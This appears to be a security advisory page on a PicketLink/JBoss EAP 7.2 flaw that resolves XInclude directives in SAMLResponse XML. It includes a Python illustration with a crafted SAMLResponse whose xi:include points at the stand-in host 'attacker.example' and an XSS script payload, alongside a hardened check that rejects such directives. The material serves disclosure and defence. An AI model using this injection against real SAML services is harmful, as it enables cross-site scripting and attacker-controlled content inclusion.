Description
It was found that PicketLink, as shipped with JBoss Enterprise Application Platform 7.2, would accept an XInclude directive in the SAMLResponse XML it parses. Because the include is resolved while the response is being parsed, an attacker who can submit a SAMLResponse can place a URL of their choosing in the directive and have the referenced content pulled into the document. An attacker could use this flaw to achieve cross-site scripting or possibly to conduct further attacks.
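The following is an added illustration of the mechanism, not PicketLink's or JBoss's own code: it shows what an XInclude-aware parser does to a SAMLResponse that carries an xi:include pointing at a remote URL, beside a pre-parse check that refuses such documents. The SAMLResponse, the attacker host `attacker.example` and the served payload are constructed for the example, and the resolution step uses Python's `xml.etree.ElementInclude` with an in-memory loader as a stand-in for a parser that fetches includes itself.

```python
"""Added example (not the PicketLink project's code): XInclude expansion inside a
SAMLResponse, and a check that rejects any XInclude directive before the
document is trusted."""
import xml.etree.ElementTree as ET
import xml.etree.ElementInclude as EI

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"
SAMLP_NS = "urn:oasis:names:tc:SAML:2.0:protocol"
SAML_NS = "urn:oasis:names:tc:SAML:2.0:assertion"

# Constructed sample: a SAMLResponse whose Issuer element carries an xi:include
# whose href points at an attacker-controlled host (hypothetical name).
MALICIOUS_RESPONSE = f"""<samlp:Response xmlns:samlp="{SAMLP_NS}"
    xmlns:saml="{SAML_NS}" xmlns:xi="{XINCLUDE_NS}"
    ID="_example" Version="2.0" IssueInstant="2019-01-01T00:00:00Z">
  <saml:Issuer>
    <xi:include href="http://attacker.example/payload.txt" parse="text"/>
  </saml:Issuer>
</samlp:Response>"""

# Constructed sample: the same response without any XInclude directive.
BENIGN_RESPONSE = f"""<samlp:Response xmlns:samlp="{SAMLP_NS}"
    xmlns:saml="{SAML_NS}"
    ID="_example" Version="2.0" IssueInstant="2019-01-01T00:00:00Z">
  <saml:Issuer>https://idp.example/metadata</saml:Issuer>
</samlp:Response>"""

# Constructed stand-in for the content the attacker's server would return.
FAKE_REMOTE = {
    "http://attacker.example/payload.txt": "<script>alert(document.domain)</script>",
}


def fake_loader(href, parse, encoding=None):
    """ElementInclude loader that serves the constructed remote content
    instead of fetching over the network (signature required by ElementInclude)."""
    data = FAKE_REMOTE[href]
    if parse == "xml":
        return ET.fromstring(data)
    return data


def expand_xincludes(xml_text):
    """Unsafe path: parse, then resolve xi:include the way an XInclude-aware
    parser does, so attacker-chosen remote content lands in the SAML document."""
    root = ET.fromstring(xml_text)
    EI.include(root, loader=fake_loader)
    return root


def issuer_text(root):
    """Return the Issuer text after parsing (stripped of surrounding whitespace)."""
    issuer = root.find(f"{{{SAML_NS}}}Issuer")
    return (issuer.text or "").strip()


def contains_xinclude(root):
    """True if any element in the XInclude namespace appears anywhere in the tree."""
    prefix = "{" + XINCLUDE_NS + "}"
    return any(el.tag.startswith(prefix) for el in root.iter())


def parse_saml_response(xml_text):
    """Hardened path: ElementTree never resolves XInclude on its own, and any
    directive that survives parsing is treated as a reason to reject the message."""
    root = ET.fromstring(xml_text)
    if contains_xinclude(root):
        raise ValueError("XInclude directive found in SAMLResponse; rejecting")
    return root


if __name__ == "__main__":
    print("expanded issuer:", issuer_text(expand_xincludes(MALICIOUS_RESPONSE)))
    try:
        parse_saml_response(MALICIOUS_RESPONSE)
    except ValueError as exc:
        print("hardened parser:", exc)
    print("benign issuer:", issuer_text(parse_saml_response(BENIGN_RESPONSE)))
```

The rejection check is only a defence in depth: the parser used for SAML messages should be configured not to process XInclude at all (in Java, `DocumentBuilderFactory.setXIncludeAware(false)`) and the product should be updated per the vendor's remediation.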
Remediation
References
Related Vulnerabilities
Moodle Uncontrolled Resource Consumption Vulnerability (CVE-2021-20185)
MediaWiki Incorrect Permission Assignment for Critical Resource Vulnerability (CVE-2021-30156)
SharePoint Integer Overflow or Wraparound Vulnerability (CVE-2008-4019)
WordPress Plugin Breezing Forms SQL Injection (1.2.7.30)
WordPress Plugin Pluginception Multiple Cross-Site Scripting Vulnerabilities (1.2)